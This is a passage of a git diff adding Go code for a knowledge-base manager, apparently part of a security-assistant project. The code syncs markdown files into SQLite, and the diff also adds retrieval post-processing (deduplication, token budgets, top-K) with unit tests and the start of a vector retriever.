遍历知识库目录 + err := filepath.WalkDir(m.basePath, func(path string, d fs.DirEntry, err error) error { + if err != nil { + return err + } + + // 跳过目录和非markdown文件 + if d.IsDir() || !strings.HasSuffix(strings.ToLower(path), ".md") { + return nil + } + + // 计算相对路径和分类 + relPath, err := filepath.Rel(m.basePath, path) + if err != nil { + return err + } + + // 第一个目录名作为分类(风险类型) + parts := strings.Split(relPath, string(filepath.Separator)) + category := "未分类" + if len(parts) > 1 { + category = parts[0] + } + + // 文件名为标题 + title := strings.TrimSuffix(filepath.Base(path), ".md") + + // 读取文件内容 + content, err := os.ReadFile(path) + if err != nil { + m.logger.Warn("读取知识库文件失败", zap.String("path", path), zap.Error(err)) + return nil // 继续处理其他文件 + } + + // 检查是否已存在 + var existingID string + var existingContent string + var existingUpdatedAt time.Time + err = m.db.QueryRow( + "SELECT id, content, updated_at FROM knowledge_base_items WHERE file_path = ?", + path, + ).Scan(&existingID, &existingContent, &existingUpdatedAt) + + if err == sql.ErrNoRows { + // 创建新项 + id := uuid.New().String() + now := time.Now() + _, err = m.db.Exec( + "INSERT INTO knowledge_base_items (id, category, title, file_path, content, created_at, updated_at) VALUES (?, ?, ?, ?, ?, ?, ?)", + id, category, title, path, string(content), now, now, + ) + if err != nil { + return fmt.Errorf("插入知识项失败: %w", err) + } + m.logger.Info("添加知识项", zap.String("id", id), zap.String("title", title), zap.String("category", category)) + // 新添加的项需要索引 + itemsToIndex = append(itemsToIndex, id) + } else if err == nil { + // 检查内容是否有变化 + contentChanged := existingContent != string(content) + if contentChanged { + // 更新现有项 + _, err = m.db.Exec( + "UPDATE knowledge_base_items SET category = ?, title = ?, content = ?, updated_at = ? WHERE id = ?", + category, title, string(content), time.Now(), existingID, + ) + if err != nil { + return fmt.Errorf("更新知识项失败: %w", err) + } + m.logger.Info("更新知识项", zap.String("id", existingID), zap.String("title", title)) + // 内容已更新的项需要重新索引 + itemsToIndex = append(itemsToIndex, existingID) + } else { + m.logger.Debug("知识项未变化,跳过", zap.String("id", existingID), zap.String("title", title)) + } + } else { + return fmt.Errorf("查询知识项失败: %w", err) + } + + return nil + }) + + if err != nil { + return nil, err + } + + return itemsToIndex, nil +} + +// GetCategories 获取所有分类(风险类型) +func (m *Manager) GetCategories() ([]string, error) { + rows, err := m.db.Query("SELECT DISTINCT category FROM knowledge_base_items ORDER BY category") + if err != nil { + return nil, fmt.Errorf("查询分类失败: %w", err) + } + defer rows.Close() + + var categories []string + for rows.Next() { + var category string + if err := rows.Scan(&category); err != nil { + return nil, fmt.Errorf("扫描分类失败: %w", err) + } + categories = append(categories, category) + } + + return categories, nil +} + +// GetStats 获取知识库统计信息 +func (m *Manager) GetStats() (int, int, error) { + // 获取分类总数 + categories, err := m.GetCategories() + if err != nil { + return 0, 0, fmt.Errorf("获取分类失败: %w", err) + } + totalCategories := len(categories) + + // 获取知识项总数 + var totalItems int + err = m.db.QueryRow("SELECT COUNT(*) FROM knowledge_base_items").Scan(&totalItems) + if err != nil { + return totalCategories, 0, fmt.Errorf("获取知识项总数失败: %w", err) + } + + return totalCategories, totalItems, nil +} + +// GetCategoriesWithItems 按分类分页获取知识项(每个分类包含其下的所有知识项) +// limit: 每页分类数量(0表示不限制) +// offset: 偏移量(按分类偏移) +func (m *Manager) GetCategoriesWithItems(limit, offset int) ([]*CategoryWithItems, int, error) { + // 首先获取所有分类(带数量统计) + rows, err := m.db.Query(` + SELECT category, COUNT(*) as item_count + FROM knowledge_base_items + GROUP BY category + ORDER BY category + `) + if err != nil { + return nil, 0, fmt.Errorf("查询分类失败: %w", err) + } + defer rows.Close() + + // 收集所有分类信息 + type categoryInfo struct { + name string + itemCount int + } + var allCategories []categoryInfo + for rows.Next() { + var info categoryInfo + if err := rows.Scan(&info.name, &info.itemCount); err != nil { + return nil, 0, fmt.Errorf("扫描分类失败: %w", err) + } + allCategories = append(allCategories, info) + } + + totalCategories := len(allCategories) + + // 应用分页(按分类分页) + var paginatedCategories []categoryInfo + if limit > 0 { + start := offset + end := offset + limit + if start >= totalCategories { + paginatedCategories = []categoryInfo{} + } else { + if end > totalCategories { + end = totalCategories + } + paginatedCategories = allCategories[start:end] + } + } else { + paginatedCategories = allCategories + } + + // 为每个分类获取其下的知识项(只返回摘要,不包含完整内容) + result := make([]*CategoryWithItems, 0, len(paginatedCategories)) + for _, catInfo := range paginatedCategories { + // 获取该分类下的所有知识项 + items, _, err := m.GetItemsSummary(catInfo.name, 0, 0) + if err != nil { + return nil, 0, fmt.Errorf("获取分类 %s 的知识项失败: %w", catInfo.name, err) + } + + result = append(result, &CategoryWithItems{ + Category: catInfo.name, + ItemCount: catInfo.itemCount, + Items: items, + }) + } + + return result, totalCategories, nil +} + +// GetItems 获取知识项列表(完整内容,用于向后兼容) +func (m *Manager) GetItems(category string) ([]*KnowledgeItem, error) { + return m.GetItemsWithOptions(category, 0, 0, true) +} + +// GetItemsWithOptions 获取知识项列表(支持分页和可选内容) +// category: 分类筛选(空字符串表示所有分类) +// limit: 每页数量(0表示不限制) +// offset: 偏移量 +// includeContent: 是否包含完整内容(false时只返回摘要) +func (m *Manager) GetItemsWithOptions(category string, limit, offset int, includeContent bool) ([]*KnowledgeItem, error) { + var rows *sql.Rows + var err error + + // 构建SQL查询 + var query string + var args []interface{} + + if includeContent { + query = "SELECT id, category, title, file_path, content, created_at, updated_at FROM knowledge_base_items" + } else { + query = "SELECT id, category, title, file_path, created_at, updated_at FROM knowledge_base_items" + } + + if category != "" { + query += " WHERE category = ?" + args = append(args, category) + } + + query += " ORDER BY category, title" + + if limit > 0 { + query += " LIMIT ?" + args = append(args, limit) + if offset > 0 { + query += " OFFSET ?" + args = append(args, offset) + } + } + + rows, err = m.db.Query(query, args...) + if err != nil { + return nil, fmt.Errorf("查询知识项失败: %w", err) + } + defer rows.Close() + + var items []*KnowledgeItem + for rows.Next() { + item := &KnowledgeItem{} + var createdAt, updatedAt string + + if includeContent { + if err := rows.Scan(&item.ID, &item.Category, &item.Title, &item.FilePath, &item.Content, &createdAt, &updatedAt); err != nil { + return nil, fmt.Errorf("扫描知识项失败: %w", err) + } + } else { + if err := rows.Scan(&item.ID, &item.Category, &item.Title, &item.FilePath, &createdAt, &updatedAt); err != nil { + return nil, fmt.Errorf("扫描知识项失败: %w", err) + } + // 不包含内容时,Content为空字符串 + item.Content = "" + } + + // 解析时间 - 支持多种格式 + timeFormats := []string{ + "2006-01-02 15:04:05.999999999-07:00", + "2006-01-02 15:04:05.999999999", + "2006-01-02T15:04:05.999999999Z07:00", + "2006-01-02T15:04:05Z", + "2006-01-02 15:04:05", + time.RFC3339, + time.RFC3339Nano, + } + + // 解析创建时间 + if createdAt != "" { + for _, format := range timeFormats { + parsed, err := time.Parse(format, createdAt) + if err == nil && !parsed.IsZero() { + item.CreatedAt = parsed + break + } + } + } + + // 解析更新时间 + if updatedAt != "" { + for _, format := range timeFormats { + parsed, err := time.Parse(format, updatedAt) + if err == nil && !parsed.IsZero() { + item.UpdatedAt = parsed + break + } + } + } + + // 如果更新时间为空,使用创建时间 + if item.UpdatedAt.IsZero() && !item.CreatedAt.IsZero() { + item.UpdatedAt = item.CreatedAt + } + + items = append(items, item) + } + + return items, nil +} + +// GetItemsCount 获取知识项总数 +func (m *Manager) GetItemsCount(category string) (int, error) { + var count int + var err error + + if category != "" { + err = m.db.QueryRow("SELECT COUNT(*) FROM knowledge_base_items WHERE category = ?", category).Scan(&count) + } else { + err = m.db.QueryRow("SELECT COUNT(*) FROM knowledge_base_items").Scan(&count) + } + + if err != nil { + return 0, fmt.Errorf("查询知识项总数失败: %w", err) + } + + return count, nil +} + +// SearchItemsByKeyword 按关键字搜索知识项(在所有数据中搜索,支持标题、分类、路径、内容匹配) +func (m *Manager) SearchItemsByKeyword(keyword string, category string) ([]*KnowledgeItemSummary, error) { + if keyword == "" { + return nil, fmt.Errorf("搜索关键字不能为空") + } + + // 构建SQL查询,使用LIKE进行关键字匹配(不区分大小写) + var query string + var args []interface{} + + // SQLite的LIKE不区分大小写,使用COLLATE NOCASE或LOWER()函数 + // 使用%keyword%进行模糊匹配 + searchPattern := "%" + keyword + "%" + + query = ` + SELECT id, category, title, file_path, created_at, updated_at + FROM knowledge_base_items + WHERE (LOWER(title) LIKE LOWER(?) OR LOWER(category) LIKE LOWER(?) OR LOWER(file_path) LIKE LOWER(?) OR LOWER(content) LIKE LOWER(?)) + ` + args = append(args, searchPattern, searchPattern, searchPattern, searchPattern) + + // 如果指定了分类,添加分类过滤 + if category != "" { + query += " AND category = ?" + args = append(args, category) + } + + query += " ORDER BY category, title" + + rows, err := m.db.Query(query, args...) + if err != nil { + return nil, fmt.Errorf("搜索知识项失败: %w", err) + } + defer rows.Close() + + var items []*KnowledgeItemSummary + for rows.Next() { + item := &KnowledgeItemSummary{} + var createdAt, updatedAt string + + if err := rows.Scan(&item.ID, &item.Category, &item.Title, &item.FilePath, &createdAt, &updatedAt); err != nil { + return nil, fmt.Errorf("扫描知识项失败: %w", err) + } + + // 解析时间 + timeFormats := []string{ + "2006-01-02 15:04:05.999999999-07:00", + "2006-01-02 15:04:05.999999999", + "2006-01-02T15:04:05.999999999Z07:00", + "2006-01-02T15:04:05Z", + "2006-01-02 15:04:05", + time.RFC3339, + time.RFC3339Nano, + } + + if createdAt != "" { + for _, format := range timeFormats { + parsed, err := time.Parse(format, createdAt) + if err == nil && !parsed.IsZero() { + item.CreatedAt = parsed + break + } + } + } + + if updatedAt != "" { + for _, format := range timeFormats { + parsed, err := time.Parse(format, updatedAt) + if err == nil && !parsed.IsZero() { + item.UpdatedAt = parsed + break + } + } + } + + if item.UpdatedAt.IsZero() && !item.CreatedAt.IsZero() { + item.UpdatedAt = item.CreatedAt + } + + items = append(items, item) + } + + return items, nil +} + +// GetItemsSummary 获取知识项摘要列表(不包含完整内容,支持分页) +func (m *Manager) GetItemsSummary(category string, limit, offset int) ([]*KnowledgeItemSummary, int, error) { + // 获取总数 + total, err := m.GetItemsCount(category) + if err != nil { + return nil, 0, err + } + + // 获取列表数据(不包含内容) + var rows *sql.Rows + var query string + var args []interface{} + + query = "SELECT id, category, title, file_path, created_at, updated_at FROM knowledge_base_items" + + if category != "" { + query += " WHERE category = ?" + args = append(args, category) + } + + query += " ORDER BY category, title" + + if limit > 0 { + query += " LIMIT ?" + args = append(args, limit) + if offset > 0 { + query += " OFFSET ?" + args = append(args, offset) + } + } + + rows, err = m.db.Query(query, args...) + if err != nil { + return nil, 0, fmt.Errorf("查询知识项失败: %w", err) + } + defer rows.Close() + + var items []*KnowledgeItemSummary + for rows.Next() { + item := &KnowledgeItemSummary{} + var createdAt, updatedAt string + + if err := rows.Scan(&item.ID, &item.Category, &item.Title, &item.FilePath, &createdAt, &updatedAt); err != nil { + return nil, 0, fmt.Errorf("扫描知识项失败: %w", err) + } + + // 解析时间 + timeFormats := []string{ + "2006-01-02 15:04:05.999999999-07:00", + "2006-01-02 15:04:05.999999999", + "2006-01-02T15:04:05.999999999Z07:00", + "2006-01-02T15:04:05Z", + "2006-01-02 15:04:05", + time.RFC3339, + time.RFC3339Nano, + } + + if createdAt != "" { + for _, format := range timeFormats { + parsed, err := time.Parse(format, createdAt) + if err == nil && !parsed.IsZero() { + item.CreatedAt = parsed + break + } + } + } + + if updatedAt != "" { + for _, format := range timeFormats { + parsed, err := time.Parse(format, updatedAt) + if err == nil && !parsed.IsZero() { + item.UpdatedAt = parsed + break + } + } + } + + if item.UpdatedAt.IsZero() && !item.CreatedAt.IsZero() { + item.UpdatedAt = item.CreatedAt + } + + items = append(items, item) + } + + return items, total, nil +} + +// GetItem 获取单个知识项 +func (m *Manager) GetItem(id string) (*KnowledgeItem, error) { + item := &KnowledgeItem{} + var createdAt, updatedAt string + err := m.db.QueryRow( + "SELECT id, category, title, file_path, content, created_at, updated_at FROM knowledge_base_items WHERE id = ?", + id, + ).Scan(&item.ID, &item.Category, &item.Title, &item.FilePath, &item.Content, &createdAt, &updatedAt) + + if err == sql.ErrNoRows { + return nil, fmt.Errorf("知识项不存在") + } + if err != nil { + return nil, fmt.Errorf("查询知识项失败: %w", err) + } + + // 解析时间 - 支持多种格式 + timeFormats := []string{ + "2006-01-02 15:04:05.999999999-07:00", + "2006-01-02 15:04:05.999999999", + "2006-01-02T15:04:05.999999999Z07:00", + "2006-01-02T15:04:05Z", + "2006-01-02 15:04:05", + time.RFC3339, + time.RFC3339Nano, + } + + // 解析创建时间 + if createdAt != "" { + for _, format := range timeFormats { + parsed, err := time.Parse(format, createdAt) + if err == nil && !parsed.IsZero() { + item.CreatedAt = parsed + break + } + } + } + + // 解析更新时间 + if updatedAt != "" { + for _, format := range timeFormats { + parsed, err := time.Parse(format, updatedAt) + if err == nil && !parsed.IsZero() { + item.UpdatedAt = parsed + break + } + } + } + + // 如果更新时间为空,使用创建时间 + if item.UpdatedAt.IsZero() && !item.CreatedAt.IsZero() { + item.UpdatedAt = item.CreatedAt + } + + return item, nil +} + +// CreateItem 创建知识项 +func (m *Manager) CreateItem(category, title, content string) (*KnowledgeItem, error) { + id := uuid.New().String() + now := time.Now() + + // 构建文件路径 + filePath := filepath.Join(m.basePath, category, title+".md") + + // 确保目录存在 + if err := os.MkdirAll(filepath.Dir(filePath), 0755); err != nil { + return nil, fmt.Errorf("创建目录失败: %w", err) + } + + // 写入文件 + if err := os.WriteFile(filePath, []byte(content), 0644); err != nil { + return nil, fmt.Errorf("写入文件失败: %w", err) + } + + // 插入数据库 + _, err := m.db.Exec( + "INSERT INTO knowledge_base_items (id, category, title, file_path, content, created_at, updated_at) VALUES (?, ?, ?, ?, ?, ?, ?)", + id, category, title, filePath, content, now, now, + ) + if err != nil { + return nil, fmt.Errorf("插入知识项失败: %w", err) + } + + return &KnowledgeItem{ + ID: id, + Category: category, + Title: title, + FilePath: filePath, + Content: content, + CreatedAt: now, + UpdatedAt: now, + }, nil +} + +// UpdateItem 更新知识项 +func (m *Manager) UpdateItem(id, category, title, content string) (*KnowledgeItem, error) { + // 获取现有项 + item, err := m.GetItem(id) + if err != nil { + return nil, err + } + + // 构建新文件路径 + newFilePath := filepath.Join(m.basePath, category, title+".md") + + // 如果路径改变,需要移动文件 + if item.FilePath != newFilePath { + // 确保新目录存在 + if err := os.MkdirAll(filepath.Dir(newFilePath), 0755); err != nil { + return nil, fmt.Errorf("创建目录失败: %w", err) + } + + // 移动文件 + if err := os.Rename(item.FilePath, newFilePath); err != nil { + return nil, fmt.Errorf("移动文件失败: %w", err) + } + + // 删除旧目录(如果为空) + oldDir := filepath.Dir(item.FilePath) + if isEmpty, _ := isEmptyDir(oldDir); isEmpty { + // 只有当目录不是知识库根目录时才删除(避免删除根目录) + if oldDir != m.basePath { + if err := os.Remove(oldDir); err != nil { + m.logger.Warn("删除空目录失败", zap.String("dir", oldDir), zap.Error(err)) + } + } + } + } + + // 写入文件 + if err := os.WriteFile(newFilePath, []byte(content), 0644); err != nil { + return nil, fmt.Errorf("写入文件失败: %w", err) + } + + // 更新数据库 + _, err = m.db.Exec( + "UPDATE knowledge_base_items SET category = ?, title = ?, file_path = ?, content = ?, updated_at = ? WHERE id = ?", + category, title, newFilePath, content, time.Now(), id, + ) + if err != nil { + return nil, fmt.Errorf("更新知识项失败: %w", err) + } + + // 删除旧的向量嵌入(需要重新索引) + _, err = m.db.Exec("DELETE FROM knowledge_embeddings WHERE item_id = ?", id) + if err != nil { + m.logger.Warn("删除旧向量嵌入失败", zap.Error(err)) + } + + return m.GetItem(id) +} + +// DeleteItem 删除知识项 +func (m *Manager) DeleteItem(id string) error { + // 获取文件路径 + var filePath string + err := m.db.QueryRow("SELECT file_path FROM knowledge_base_items WHERE id = ?", id).Scan(&filePath) + if err != nil { + return fmt.Errorf("查询知识项失败: %w", err) + } + + // 删除文件 + if err := os.Remove(filePath); err != nil && !os.IsNotExist(err) { + m.logger.Warn("删除文件失败", zap.String("path", filePath), zap.Error(err)) + } + + // 删除数据库记录(级联删除向量) + _, err = m.db.Exec("DELETE FROM knowledge_base_items WHERE id = ?", id) + if err != nil { + return fmt.Errorf("删除知识项失败: %w", err) + } + + // 删除空目录(如果为空) + dir := filepath.Dir(filePath) + if isEmpty, _ := isEmptyDir(dir); isEmpty { + // 只有当目录不是知识库根目录时才删除(避免删除根目录) + if dir != m.basePath { + if err := os.Remove(dir); err != nil { + m.logger.Warn("删除空目录失败", zap.String("dir", dir), zap.Error(err)) + } + } + } + + return nil +} + +// isEmptyDir 检查目录是否为空(忽略隐藏文件和 . 开头的文件) +func isEmptyDir(dir string) (bool, error) { + entries, err := os.ReadDir(dir) + if err != nil { + return false, err + } + for _, entry := range entries { + // 忽略隐藏文件(以 . 开头) + if !strings.HasPrefix(entry.Name(), ".") { + return false, nil + } + } + return true, nil +} + +// LogRetrieval 记录检索日志 +func (m *Manager) LogRetrieval(conversationID, messageID, query, riskType string, retrievedItems []string) error { + id := uuid.New().String() + itemsJSON, _ := json.Marshal(retrievedItems) + + _, err := m.db.Exec( + "INSERT INTO knowledge_retrieval_logs (id, conversation_id, message_id, query, risk_type, retrieved_items, created_at) VALUES (?, ?, ?, ?, ?, ?, ?)", + id, conversationID, messageID, query, riskType, string(itemsJSON), time.Now(), + ) + return err +} + +// GetIndexStatus 获取索引状态 +func (m *Manager) GetIndexStatus() (map[string]interface{}, error) { + // 获取总知识项数 + var totalItems int + err := m.db.QueryRow("SELECT COUNT(*) FROM knowledge_base_items").Scan(&totalItems) + if err != nil { + return nil, fmt.Errorf("查询总知识项数失败: %w", err) + } + + // 获取已索引的知识项数(有向量嵌入的) + var indexedItems int + err = m.db.QueryRow(` + SELECT COUNT(DISTINCT item_id) + FROM knowledge_embeddings + `).Scan(&indexedItems) + if err != nil { + return nil, fmt.Errorf("查询已索引项数失败: %w", err) + } + + // 计算进度百分比 + var progressPercent float64 + if totalItems > 0 { + progressPercent = float64(indexedItems) / float64(totalItems) * 100 + } else { + progressPercent = 100.0 + } + + // 判断是否完成 + isComplete := indexedItems >= totalItems && totalItems > 0 + + return map[string]interface{}{ + "total_items": totalItems, + "indexed_items": indexedItems, + "progress_percent": progressPercent, + "is_complete": isComplete, + }, nil +} + +// GetRetrievalLogs 获取检索日志 +func (m *Manager) GetRetrievalLogs(conversationID, messageID string, limit int) ([]*RetrievalLog, error) { + var rows *sql.Rows + var err error + + if messageID != "" { + rows, err = m.db.Query( + "SELECT id, conversation_id, message_id, query, risk_type, retrieved_items, created_at FROM knowledge_retrieval_logs WHERE message_id = ? ORDER BY created_at DESC LIMIT ?", + messageID, limit, + ) + } else if conversationID != "" { + rows, err = m.db.Query( + "SELECT id, conversation_id, message_id, query, risk_type, retrieved_items, created_at FROM knowledge_retrieval_logs WHERE conversation_id = ? ORDER BY created_at DESC LIMIT ?", + conversationID, limit, + ) + } else { + rows, err = m.db.Query( + "SELECT id, conversation_id, message_id, query, risk_type, retrieved_items, created_at FROM knowledge_retrieval_logs ORDER BY created_at DESC LIMIT ?", + limit, + ) + } + + if err != nil { + return nil, fmt.Errorf("查询检索日志失败: %w", err) + } + defer rows.Close() + + var logs []*RetrievalLog + for rows.Next() { + log := &RetrievalLog{} + var createdAt string + var itemsJSON sql.NullString + if err := rows.Scan(&log.ID, &log.ConversationID, &log.MessageID, &log.Query, &log.RiskType, &itemsJSON, &createdAt); err != nil { + return nil, fmt.Errorf("扫描检索日志失败: %w", err) + } + + // 解析时间 - 支持多种格式 + var err error + timeFormats := []string{ + "2006-01-02 15:04:05.999999999-07:00", + "2006-01-02 15:04:05.999999999", + "2006-01-02T15:04:05.999999999Z07:00", + "2006-01-02T15:04:05Z", + "2006-01-02 15:04:05", + time.RFC3339, + time.RFC3339Nano, + } + + for _, format := range timeFormats { + log.CreatedAt, err = time.Parse(format, createdAt) + if err == nil && !log.CreatedAt.IsZero() { + break + } + } + + // 如果所有格式都失败,记录警告但继续处理 + if log.CreatedAt.IsZero() { + m.logger.Warn("解析检索日志时间失败", + zap.String("timeStr", createdAt), + zap.Error(err), + ) + // 使用当前时间作为fallback + log.CreatedAt = time.Now() + } + + // 解析检索项 + if itemsJSON.Valid { + json.Unmarshal([]byte(itemsJSON.String), &log.RetrievedItems) + } + + logs = append(logs, log) + } + + return logs, nil +} + +// DeleteRetrievalLog 删除检索日志 +func (m *Manager) DeleteRetrievalLog(id string) error { + result, err := m.db.Exec("DELETE FROM knowledge_retrieval_logs WHERE id = ?", id) + if err != nil { + return fmt.Errorf("删除检索日志失败: %w", err) + } + + rowsAffected, err := result.RowsAffected() + if err != nil { + return fmt.Errorf("获取删除行数失败: %w", err) + } + + if rowsAffected == 0 { + return fmt.Errorf("检索日志不存在") + } + + return nil +} diff --git a/knowledge/retrieval_postprocess.go b/knowledge/retrieval_postprocess.go new file mode 100644 index 00000000..eb69e4c3 --- /dev/null +++ b/knowledge/retrieval_postprocess.go @@ -0,0 +1,213 @@ +package knowledge + +import ( + "context" + "crypto/sha256" + "encoding/hex" + "fmt" + "strings" + "sync" + "unicode" + "unicode/utf8" + + "cyberstrike-ai/internal/config" + + "github.com/cloudwego/eino/schema" + "github.com/pkoukk/tiktoken-go" +) + +// postRetrieveMaxPrefetchCap 限制单次向量候选上限,避免误配置导致全表扫压力过大。 +const postRetrieveMaxPrefetchCap = 200 + +// DocumentReranker 可选重排(如交叉编码器 / 第三方 Rerank API),由 [Retriever.SetDocumentReranker] 注入;失败时在适配层降级为向量序。 +type DocumentReranker interface { + Rerank(ctx context.Context, query string, docs []*schema.Document) ([]*schema.Document, error) +} + +// NopDocumentReranker 占位实现,便于测试或未启用重排时显式注入。 +type NopDocumentReranker struct{} + +// Rerank implements [DocumentReranker] as no-op. +func (NopDocumentReranker) Rerank(_ context.Context, _ string, docs []*schema.Document) ([]*schema.Document, error) { + return docs, nil +} + +var tiktokenEncMu sync.Mutex +var tiktokenEncCache = map[string]*tiktoken.Tiktoken{} + +func encodingForTokenizerModel(model string) (*tiktoken.Tiktoken, error) { + m := strings.TrimSpace(model) + if m == "" { + m = "gpt-4" + } + tiktokenEncMu.Lock() + defer tiktokenEncMu.Unlock() + if enc, ok := tiktokenEncCache[m]; ok { + return enc, nil + } + enc, err := tiktoken.EncodingForModel(m) + if err != nil { + enc, err = tiktoken.GetEncoding("cl100k_base") + if err != nil { + return nil, err + } + } + tiktokenEncCache[m] = enc + return enc, nil +} + +func countDocTokens(text, model string) (int, error) { + enc, err := encodingForTokenizerModel(model) + if err != nil { + return 0, err + } + toks := enc.Encode(text, nil, nil) + return len(toks), nil +} + +// normalizeContentFingerprintKey 去重键:trim + 空白折叠(不改动大小写,避免合并仅大小写不同的代码片段)。 +func normalizeContentFingerprintKey(s string) string { + s = strings.TrimSpace(s) + var b strings.Builder + b.Grow(len(s)) + prevSpace := false + for _, r := range s { + if unicode.IsSpace(r) { + if !prevSpace { + b.WriteByte(' ') + prevSpace = true + } + continue + } + prevSpace = false + b.WriteRune(r) + } + return b.String() +} + +func contentNormKey(d *schema.Document) string { + if d == nil { + return "" + } + n := normalizeContentFingerprintKey(d.Content) + if n == "" { + return "" + } + sum := sha256.Sum256([]byte(n)) + return hex.EncodeToString(sum[:]) +} + +// dedupeByNormalizedContent 按规范化正文去重,保留向量检索顺序中首次出现的文档(同正文仅保留一条)。 +func dedupeByNormalizedContent(docs []*schema.Document) []*schema.Document { + if len(docs) < 2 { + return docs + } + seen := make(map[string]struct{}, len(docs)) + out := make([]*schema.Document, 0, len(docs)) + for _, d := range docs { + if d == nil { + continue + } + k := contentNormKey(d) + if k == "" { + out = append(out, d) + continue + } + if _, ok := seen[k]; ok { + continue + } + seen[k] = struct{}{} + out = append(out, d) + } + return out +} + +// truncateDocumentsByBudget 按检索顺序整段保留文档,直至字符数或 token 数(任一启用)超限则停止。 +func truncateDocumentsByBudget(docs []*schema.Document, maxRunes, maxTokens int, tokenModel string) ([]*schema.Document, error) { + if len(docs) == 0 { + return docs, nil + } + unlimitedChars := maxRunes <= 0 + unlimitedTok := maxTokens <= 0 + if unlimitedChars && unlimitedTok { + return docs, nil + } + + remRunes := maxRunes + remTok := maxTokens + out := make([]*schema.Document, 0, len(docs)) + + for _, d := range docs { + if d == nil || strings.TrimSpace(d.Content) == "" { + continue + } + runes := utf8.RuneCountInString(d.Content) + if !unlimitedChars && runes > remRunes { + break + } + var tok int + var err error + if !unlimitedTok { + tok, err = countDocTokens(d.Content, tokenModel) + if err != nil { + return nil, fmt.Errorf("token count: %w", err) + } + if tok > remTok { + break + } + } + out = append(out, d) + if !unlimitedChars { + remRunes -= runes + } + if !unlimitedTok { + remTok -= tok + } + } + return out, nil +} + +// EffectivePrefetchTopK 计算向量检索应拉取的候选条数(供粗排 / 去重 / 重排)。 +func EffectivePrefetchTopK(topK int, po *config.PostRetrieveConfig) int { + if topK < 1 { + topK = 5 + } + fetch := topK + if po != nil && po.PrefetchTopK > fetch { + fetch = po.PrefetchTopK + } + if fetch > postRetrieveMaxPrefetchCap { + fetch = postRetrieveMaxPrefetchCap + } + return fetch +} + +// ApplyPostRetrieve 检索后处理:规范化正文去重 → 预算截断 → 最终 TopK。重排在 [VectorEinoRetriever] 中单独调用以便失败时降级。 +func ApplyPostRetrieve(docs []*schema.Document, po *config.PostRetrieveConfig, tokenModel string, finalTopK int) ([]*schema.Document, error) { + if finalTopK < 1 { + finalTopK = 5 + } + if len(docs) == 0 { + return docs, nil + } + + maxChars := 0 + maxTok := 0 + if po != nil { + maxChars = po.MaxContextChars + maxTok = po.MaxContextTokens + } + + out := dedupeByNormalizedContent(docs) + + var err error + out, err = truncateDocumentsByBudget(out, maxChars, maxTok, tokenModel) + if err != nil { + return nil, err + } + + if len(out) > finalTopK { + out = out[:finalTopK] + } + return out, nil +} diff --git a/knowledge/retrieval_postprocess_test.go b/knowledge/retrieval_postprocess_test.go new file mode 100644 index 00000000..10c661a8 --- /dev/null +++ b/knowledge/retrieval_postprocess_test.go @@ -0,0 +1,62 @@ +package knowledge + +import ( + "testing" + + "cyberstrike-ai/internal/config" + + "github.com/cloudwego/eino/schema" +) + +func doc(id, content string, score float64) *schema.Document { + d := &schema.Document{ID: id, Content: content, MetaData: map[string]any{metaKBItemID: "it1"}} + d.WithScore(score) + return d +} + +func TestDedupeByNormalizedContent(t *testing.T) { + a := doc("1", "hello world", 0.9) + b := doc("2", "hello world", 0.8) + c := doc("3", "other", 0.7) + out := dedupeByNormalizedContent([]*schema.Document{a, b, c}) + if len(out) != 2 { + t.Fatalf("len=%d want 2", len(out)) + } + if out[0].ID != "1" || out[1].ID != "3" { + t.Fatalf("order/ids wrong: %#v", out) + } +} + +func TestEffectivePrefetchTopK(t *testing.T) { + if g := EffectivePrefetchTopK(5, nil); g != 5 { + t.Fatalf("got %d", g) + } + if g := EffectivePrefetchTopK(5, &config.PostRetrieveConfig{PrefetchTopK: 50}); g != 50 { + t.Fatalf("got %d", g) + } + if g := EffectivePrefetchTopK(5, &config.PostRetrieveConfig{PrefetchTopK: 9999}); g != postRetrieveMaxPrefetchCap { + t.Fatalf("cap: got %d", g) + } +} + +func TestApplyPostRetrieveTruncateAndTopK(t *testing.T) { + d1 := doc("1", "ab", 0.9) + d2 := doc("2", "cd", 0.8) + d3 := doc("3", "ef", 0.7) + po := &config.PostRetrieveConfig{MaxContextChars: 3} + out, err := ApplyPostRetrieve([]*schema.Document{d1, d2, d3}, po, "gpt-4", 5) + if err != nil { + t.Fatal(err) + } + if len(out) != 1 || out[0].ID != "1" { + t.Fatalf("got %#v", out) + } + + out2, err := ApplyPostRetrieve([]*schema.Document{d1, d2, d3}, nil, "gpt-4", 2) + if err != nil { + t.Fatal(err) + } + if len(out2) != 2 { + t.Fatalf("topk: len=%d", len(out2)) + } +} diff --git a/knowledge/retriever.go b/knowledge/retriever.go new file mode 100644 index 00000000..9145b2c6 --- /dev/null +++ b/knowledge/retriever.go @@ -0,0 +1,305 @@ +package knowledge + +import ( + "context" + "database/sql" + "encoding/json" + "fmt" + "math" + "sort" + "strings" + "sync" + + "cyberstrike-ai/internal/config" + + "github.com/cloudwego/eino/components/retriever" + "github.com/cloudwego/eino/schema" + "go.uber.org/zap" +) + +// Retriever 检索器:SQLite 存向量 + Eino 嵌入,**纯向量检索**(余弦相似度、TopK、阈值), +// 实现语义与 [retriever.Retriever] 适配层 [VectorEinoRetriever] 一致。 +type Retriever struct { + db *sql.DB + embedder *Embedder + config *RetrievalConfig + logger *zap.Logger + + rerankMu sync.RWMutex + reranker DocumentReranker +} + +// RetrievalConfig 检索配置 +type RetrievalConfig struct { + TopK int + SimilarityThreshold float64 + // SubIndexFilter 非空时仅检索 sub_indexes 包含该标签(逗号分隔之一)的行;空 sub_indexes 的旧行仍保留以兼容。 + SubIndexFilter string + PostRetrieve config.PostRetrieveConfig +} + +// NewRetriever 创建新的检索器 +func NewRetriever(db *sql.DB, embedder *Embedder, config *RetrievalConfig, logger *zap.Logger) *Retriever { + return &Retriever{ + db: db, + embedder: embedder, + config: config, + logger: logger, + } +} + +// UpdateConfig 更新检索配置 +func (r *Retriever) UpdateConfig(cfg *RetrievalConfig) { + if cfg != nil { + r.config = cfg + if r.logger != nil { + r.logger.Info("检索器配置已更新", + zap.Int("top_k", cfg.TopK), + zap.Float64("similarity_threshold", cfg.SimilarityThreshold), + zap.String("sub_index_filter", cfg.SubIndexFilter), + zap.Int("post_retrieve_prefetch_top_k", cfg.PostRetrieve.PrefetchTopK), + zap.Int("post_retrieve_max_context_chars", cfg.PostRetrieve.MaxContextChars), + zap.Int("post_retrieve_max_context_tokens", cfg.PostRetrieve.MaxContextTokens), + ) + } + } +} + +// SetDocumentReranker 注入可选重排器(并发安全);nil 表示禁用。 +func (r *Retriever) SetDocumentReranker(rr DocumentReranker) { + if r == nil { + return + } + 